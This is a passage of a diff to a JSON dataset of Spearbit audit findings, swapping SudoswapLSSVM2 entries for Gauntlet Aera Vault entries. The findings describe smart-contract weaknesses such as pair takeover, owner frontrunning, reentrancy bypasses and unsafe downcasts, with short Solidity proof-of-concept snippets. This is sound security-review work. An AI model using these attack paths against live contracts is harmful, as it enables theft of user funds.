safeTransferFrom(). This can be an issue with fee on transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on that, see POC below. Note: also see issue \"Malicious router mitigation may break for deflationary tokens\". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof Of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import \"hardhat/console.sol\"; import {ERC20} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol\"; ,! import {SafeTransferLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol\"; ,! contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log(\"after safeTransferFrom\"); } }", + "title": "OpenZeppelin best practices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault uses OpenZeppelin release 4.3.2 which is copied into their github. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths. This has the risk of making a mistake in the process. import \"./dependencies/openzeppelin/SafeERC20.sol\"; import \"./dependencies/openzeppelin/IERC20.sol\"; import \"./dependencies/openzeppelin/IERC165.sol\"; import \"./dependencies/openzeppelin/Ownable.sol\"; import \"./dependencies/openzeppelin/ReentrancyGuard.sol\"; import \"./dependencies/openzeppelin/Math.sol\"; import \"./dependencies/openzeppelin/SafeCast.sol\"; import \"./dependencies/openzeppelin/ERC165Checker.sol\";", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "A malicious settings contract can call onOwnershipTransferred() to take over pair", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function onOwnershipTransferred() can be called from a pair via call(). This can be done It can either before transferOwnership() or after it. If it is called before then it updates the AssetRecipient. only be called after the transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost; so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. 11 function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, \"Only TRADE pairs\"); ... }", + "title": "Possible rounding down of fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "If certain token has a few decimals numbers then fees could be rounded down to 0, especially if time between calculateAndDistributeManagerFees() is relatively small. This also could slightly shift the spot price because the balance of one coin is lowered while the other remains still. With fewer decimals the situation worsens, e.g. Gemini USD GUSD has 2 decimals, therefore the problem occurs with a balance of 10_000 GUSD. Note: The rounding down is probably neglectable in most cases. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < tokens.length; i++) { amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0 } ... } With 1 USDC in the vault and 2 hours between calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0. This behavior is demonstrated in the following POC: 21 import \"hardhat/console.sol\"; contract testcontract { uint256 constant ONE = 10**18; uint managementFee = 10**8; constructor() { // MAX_MANAGEMENT_FEE = 10**9; // 1 USDC uint holdings = 1E6; uint delay = 2 hours; uint managerFeeIndex = delay * managementFee; uint amounts = (holdings * managerFeeIndex) / ONE; console.log(\"Fee\",amounts); // fee is 0 } }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "One can attempt to steal a pair's ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts.", + "title": "Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The initiateFinalization() function is missing a nonReentrant modifier while calculateAnd- DistributeManagerFees() executes external calls. Same goes for setManager() and claimManagerFees() func- tions.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "swap() could mix tokens with ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true , this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } }", + "title": "Potential division by 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "If the balance (e.g. holdings[]) of a token is 0 in deposit() then the dividing by holdings[] would cause a revert. Note: Function withdraw() has similar code but when holdings[]==0 its not possible to withdraw() anyway. Note: The current Mannon vault code will not allow the balances to be 0. Note: Although not used in the current code, in order to do a deregisterTokens(), Balancer requires the balance to be 0. Additionally, refer to the following Balancer documentation about the-vault#deregistertokens. The worst case scenario is deposit() not working. function deposit(uint256[] calldata amounts) ... { ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { depositToken(tokens[i], amounts[i]); uint256 newBalance = holdings[i] + amounts[i]; newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0 } ... ... } Similar divisions by 0 could occur in getWeightChangeRatio(). The function is called from updateWeightsGradu- ally(). If this is due to targetWeight being 0, then it is the desired result. Current weight should not be 0 due balancer checks. function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... { return weight > targetWeight ? (ONE * weight) / targetWeight : (ONE * targetWeight) / weight; // could revert if targetWeight == 0 // could revert if weight== 0 }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Using a single tokenRecipient in VeryFastRouter could result in locked NFTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens to tokenRe- cipient and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens+NFTs to the same address when interacting with this router. This coupled with the use of nft.transferFrom() may result in NFTs being sent to contracts that are not ERC-721 receivers and get them locked forever.", + "title": "Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Currently the Aera Vault is using BaseManagedPoolFactory as the factory to deploy the Balancer pool while Balancers documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory: This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner. 23", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Owner can mislead users by abusing changeSpotPrice() and changeDelta()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spotprice to 0 and gets the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters where the aftereffects depends on the curve being used. Note: The swapNFTsForToken() parameter minExpectedTokenOutput and swapTokenForSpecificNFTs() param- eter maxExpectedTokenInput protect users against sudden price changes. But users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... }", + "title": "Adopt the two-step ownership transfer pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effec- tively breaking vault critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to revert the transaction every time. However, the transferOwnership() function may also lead to the same issue if the ownership is transferred to an uncontrollable address because of human errors or attacks on the Treasury.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Pair may receive less ETH trade fees than expected under certain conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Depending on the values of protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient. However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20.", + "title": "Implement zero-address check for manager_", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Non-existent zero-address checks inside the constuctor for the manager_ parameter. If manager_- becomes a zero address then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or uses any balance funds from the pair itself. In LSSVMPairETH, the ordering of subtracting/transferring the tradeFees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or uses any balance funds from the pair itself.", + "title": "Simplify tracking of managerFeeIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage vari- ables (e.g. costing SLOAD/SSTORE). However, because managementFee is immutable this can be simplified to one storage variable, saving gas and improving code legibility. uint256 public immutable managementFee; // can't be changed function calculateAndDistributeManagerFees() internal { updateManagerFeeIndex(); ... if (managerFeeIndex == 0) { return; use managerFeeIndex } ... // ... managerFeeIndex = 0; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; lastFeeCheckpoint = block.timestamp.toUint64(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "NFTs may be exchanged for 0 tokens when price decreases too much", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, then getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even while the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } }", + "title": "Directly call getTokensData() from returnFunds()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokens- Data() thus waste gas unnecessarily. function returnFunds() internal returns (uint256[] memory amounts) { uint256[] memory holdings = getHoldings(); IERC20[] memory tokens = getTokens(); ... } function getHoldings() public view override returns (uint256[] memory amounts) { (, amounts, ) = getTokensData(); } function getTokens() public view override returns (IERC20[] memory tokens) { (tokens, , ) = getTokensData(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "balanceOf() can be circumvented via reentrancy and two pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A reentrancy issue can occur if two pairs with the same ERC1155 NFTid are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented. If a reentrant call, to a second pair, supplies a sufficient amount of NFTs then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is mali- cious then it also has other ways to steal the NFTs; however with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20 so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } ,! }", + "title": "Change uint32 and uint64 to uint256", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The contract contains a few variables/constants that are smaller than uint256: noticePeriod, no- ticeTimeoutAt and lastFeeCheckpoint. This doesnt actually save gas because they are not part of a struct and still take up a storage slot. It even costs more gas because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function. If that would happen, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using int256 simplifies the code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { ... uint32 public immutable noticePeriod; ... uint64 public noticeTimeoutAt; ... uint64 public lastFeeCheckpoint = type(uint64).max; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; // could get large when lastFeeCheckpoint wraps lastFeeCheckpoint = block.timestamp.toUint64(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Function call() is risky and can be restricted further", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function call() is powerful and thus risky. To reduce the risk it can be restricted further by dis- allowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers. function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result,) = target.call{value: 0}(data); require(result, \"Call failed\"); } 16", + "title": "Use block.timestamp directly instead of assigning it to a temporary variable.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "It is preferable to use block.timestamp directly in your code instead of assigning it to a temporary variable as it only uses 2 gas.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to much less value for newSpotPrice than expected. function getBuyInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee ) { ... } // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... Same happens when calculating newDelta in getSellInfo(): function getSellInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee ) { PoC ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... Proof of concept about how this wouldn't revert but silently overflow: 17 import \"hardhat/console.sol\"; contract test{ constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } }", + "title": "Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and ex- ternal calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current implementation of Aera Vault always calls pool.getPoolId() or indirectly getPoolId() to retrieve the ID of the immutable state variable pool that has been declared at constructor time. The pool.getPoolId() is a getter function defined in the Balancer BasePool contract: function getPoolId() public view override returns (bytes32) { return _poolId; } Inside the same BasePool contract the _poolId is defined as immutable which means that after creating a pool it will never change. For this reason it is possible to apply the same logic inside the Aera Vault and use an immutable variable to avoiding external calls and save gas.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransfer- ERC20From()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the cor- rect type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pairs. These could succeed for example if a NFT is used that supports both ERC721 and ERC1155. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\" The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... }", + "title": "Save values in temporary variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "We observed multiple occurrences in the codebase where .length was used in for loops. This could lead to more gas consumption as .length gets called repetitively until the for loop finishes. When indexed variables are used multiple times inside the loop in a read only way these can be stored in a temporary variable to save some gas. for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be calculated repeatedly ... ... = tokens[i].balanceOf(...); tokens[i].safeTransfer(owner(), ...); } // tokens[i] has to be evaluated multiple times", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS to the pair owner for the enhanced royalty terms of the setting despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign-up for their settings contract but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms. A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised at the prematurely forced settings contract termination by the collection admin, loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts.", + "title": "Aera could be prone to out-of-gas transaction revert when managing a high number of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Balancer ManagedPool used by Aera has a max limit of 50 token. Functions like: initialDeposit(), deposit(), withdraw() and finalize() involve numerous external direct and indirect (made by Balancer itself when called by Aera) calls and math calculations that are done for each token managed by the pool. The functions deposit() and withdraw() are especially gas intensive, given that they also internally call calcu- lateAndDistributeManagerFees() that will transfer, for each token, a management fee to the manager. For these reasons Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (max block size depends on which chain the project will be deployed).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "PropertyCheckers and Settings not sufficiently restricted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The LSSVMPairFactory accepts any address for external contracts which contain critical logic but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings con- tracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern which means that it's difficult to completely rely on them. Both _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ... // no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ... // no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); }", + "title": "Use a consistent way to call getNormalizedWeights()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The functions deposit() and withdraw() call function getNormalizedWeights() while the function updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent. 29 function deposit(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Deposit(amounts, getNormalizedWeights()); } function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Withdraw(amounts, allowances, getNormalizedWeights()); } function updateWeightsGradually(...) ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function cancelWeightUpdates() ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function getNormalizedWeights() ... { return pool.getNormalizedWeights(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "A malicious router can skip transfer of royalties and protocol fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pair- TransferERC20From() functions which do not actually transfer the number of tokens as expected. This is within the protocol's threat model as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. the protocol/factory intention- Royalty recipients do not receive their royalties from the malicious router if ally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee.", + "title": "Add function disableTrading() to IManagerAPI.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The disableTrading() function can also be called by managers because of the onlyOwnerOrMan- agermodifier. However in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { /// PROTOCOL API /// function disableTrading() ... onlyOwnerOrManager ... { ... } /// MANAGER API /// } interface IManagerAPI { function updateWeightsGradually(...) external; function cancelWeightUpdates() external; function setSwapFee(uint256 newSwapFee) external; function claimManagerFees() external; } // disableTrading() isn't present 30", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "LSSVMPair implements an onlyOwner multicall function to allow owner to batch multiple calls. Natspec indicates that this is \"Intended for withdrawing/altering pool pricing in one tx, only callable by owner, can- not change owner.\" The check require(owner() == msg.sender, \"Ownership cannot be changed in multi- call\"); with a preceding comment \"Prevent multicall from malicious frontend sneaking in ownership change\" indicates the intent of the check and that a malicious front-end is within the threat model. While the post-loop check prevents malicious front-ends from executing ownership changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within onOwnershipTransferred() callback -> change ownership back to originally authorized msg.sender owner before returning from the callback and successfully executing any subsequent (onlyOwner) calls and the existing check. While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner.", + "title": "Doublecheck layout functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Different ways are used to layout functions. Especially the part between ( ... ) and between ) ... { is sometimes done on one line and sometimes split in multiple lines. Also { is sometimes at the end of a line and sometimes at the beginning. Although the layout is not disturbing it might be useful to doublecheck it. Here are a few examples of different layouts: function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function depositToken(IERC20 token, uint256 amount) internal { ... } function updatePoolBalance( uint256[] memory amounts, IBVault.PoolBalanceOpKind kind ) internal { ... } function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function updateWeightsGradually( uint256[] calldata targetWeights, uint256 startTime, uint256 endTime ) external override onlyManager whenInitialized whenNotFinalizing { ... } function getWeightChangeRatio(uint256 weight, uint256 targetWeight) internal pure returns (uint256) { } ...", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Manifold admins are incorrectly not allowed by authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides including admin interfaces of NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol sup- ports royalties from other marketplaces of Manifold, Rarible, SuperRare and Zora. Of those, Manifold does have getAdmins() interface which is not considered in authAllowedForToken. And it is not certain that the others don't.", + "title": "Use Math library functions in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the AeraVaultV1 contract, the OZs Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() allow deposits of ERC 721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation. 